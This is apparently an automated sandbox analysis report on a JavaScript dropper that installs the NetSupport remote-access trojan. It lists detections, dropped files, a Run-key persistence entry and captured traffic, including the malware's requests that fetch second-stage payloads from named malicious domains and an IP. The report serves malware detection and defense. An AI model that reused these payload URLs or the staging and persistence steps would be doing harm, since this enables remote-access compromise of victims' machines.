Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5j0fix05fy.js

Overview

General Information

Sample name:5j0fix05fy.js
renamed because original name is a hash value
Original sample name:84bf3a782161537926aa8fd1061d852d33ebbf57889521c99e9b3c8b79f22571.js
Analysis ID:1576919
MD5:c7948bba3c4c8ac9be2b72cc10e7df54
SHA1:4b6ed5bdb4fb5f8b4e50264530bc3f83e2075fc6
SHA256:84bf3a782161537926aa8fd1061d852d33ebbf57889521c99e9b3c8b79f22571
Tags:194-180-191-64jsuser-JAMESWT_MHT
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Deletes itself after installation
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6896 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • client32.exe (PID: 6024 cmdline: "C:\ProgramData\4dvs23l\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 4076 cmdline: "C:\ProgramData\4dvs23l\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 2488 cmdline: "C:\ProgramData\4dvs23l\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\4dvs23l\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\ProgramData\4dvs23l\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\4dvs23l\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\4dvs23l\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\ProgramData\4dvs23l\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000006.00000002.2265922513.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000004.00000002.3004861029.0000000000C32000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000006.00000000.2262484311.0000000000C32000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000005.00000002.2183097774.0000000000C32000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000004.00000000.2143718322.0000000000C32000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 11 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      5.0.client32.exe.c30000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        5.2.client32.exe.6f8f0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          6.2.client32.exe.6fbd0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            6.2.client32.exe.c30000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              4.2.client32.exe.6fbd0000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 20 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 98.142.240.215, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6896, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js", ProcessId: 6896, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\4dvs23l\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 98.142.240.215, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6896, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js", ProcessId: 6896, ProcessName: wscript.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-17T18:12:53.391344+010020583141Exploit Kit Activity Detected192.168.2.4559881.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-17T18:12:22.892738+010020583151Exploit Kit Activity Detected192.168.2.4641141.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-17T18:12:55.545266+010020583181Exploit Kit Activity Detected192.168.2.44973898.142.240.215443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-17T18:12:24.747215+010020583191Exploit Kit Activity Detected192.168.2.44973198.142.240.215443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-17T18:12:21.687029+010028277451Malware Command and Control Activity Detected192.168.2.449739194.180.191.64443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: https://depostsolo.biz/work/download.php?id=100&76794Avira URL Cloud: Label: malware
                                Source: http://194.180.191.64/fakeurl.htmAvira URL Cloud: Label: malware
                                Source: https://businessinsanjose.info/work/yyy.zip?8982Avira URL Cloud: Label: malware
                                Source: https://depostsolo.biz/Avira URL Cloud: Label: malware
                                Multi AV Scanner detection for dropped file
                                Source: C:\ProgramData\4dvs23l\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\ProgramData\4dvs23l\client32.exeReversingLabs: Detection: 27%
                                Source: C:\ProgramData\4dvs23l\remcmdstub.exeReversingLabs: Detection: 28%
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,CryptGetProvParam,CryptGetProvParam,GetLastError,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110ADA40
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110ADA40
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\ProgramData\4dvs23l\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 98.142.240.215:443 -> 192.168.2.4:49731 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 98.142.240.215:443 -> 192.168.2.4:49738 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_111273E0 GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110BD520 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,4_2_110BD520
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1110F910 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,4_2_1110F910
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D900
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1110BD70 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_110663B0 _memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D900
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111273E0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110BD70
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_110663B0
                                Source: C:\ProgramData\4dvs23l\client32.exeCode function: 5_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106ABD0

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2058319 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (depostsolo .biz) : 192.168.2.4:49731 -> 98.142.240.215:443
                                Source: Network trafficSuricata IDS: 2058315 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (depostsolo .biz) : 192.168.2.4:64114 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2058314 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (businessinsanjose .info) : 192.168.2.4:55988 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2058318 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (businessinsanjose .info) : 192.168.2.4:49738 -> 98.142.240.215:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49739 -> 194.180.191.64:443
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 98.142.240.215 443Jump to behavior
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: VELCOMCA VELCOMCA
                                Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: POST /work/download.php?id=100&76794 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: depostsolo.bizContent-Length: 5Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /work/yyy.zip?8982 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: businessinsanjose.infoConnection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.64
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.64
                                Source: unknownTCP traffic detected without corresponding DNS query: 194.180.191.64
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /work/yyy.zip?8982 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: businessinsanjose.infoConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: depostsolo.biz
                                Source: global trafficDNS traffic detected: DNS query: businessinsanjose.info
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST /work/download.php?id=100&76794 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: depostsolo.bizContent-Length: 5Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:13:04 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f388aaa8aee5e74-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kORzdyI%2BjEye5ENEo%2FibFIvNIkODj0vC%2FxDLTGGyjO1aUE8ILgFbAESqJK6NWPKV0uGVMEZWzoqTE09PItCstIXkKPzNrbGq4hc%2FkDEa6EmtlRstrfyZiv1%2F%2Bjb%2FDedX7duzVRkHUonPYjwx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:13:06 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f388ab3ef2e0f98-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAF%2FXXEytpJW2n6mJdpv%2FQO6IencmOUnvx9EDAWQr7K5zqlrDq8%2F8I5beGapiqH5h%2FqNPo6g6tFEgCTeT%2BirFiO55mQ%2F5ePimJczOf%2FijbNP3BdtKJ6q4eVbsffd3bvlEGJkaTzo0U9VhoaZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:13:07 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f388abd39a85b5f-IADCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEuKB1MQQQfPYM%2FEbUKEIvVu2b036KmstI%2FHGUjJn7yPOmsNMKZ%2FKEbsvLz78koetwvK08Xx1q4WjNa6%2Bl3jwLhpFLeYJxIKKPOOVG3woB8PGXS1IwbzkXbT7iPT3vb%2FU37It5WfMJ8Wkwj8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=8391&min_rtt=8391&rtt_var=4195&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: client32.exeString found in binary or memory: http://%s/fakeurl.htm
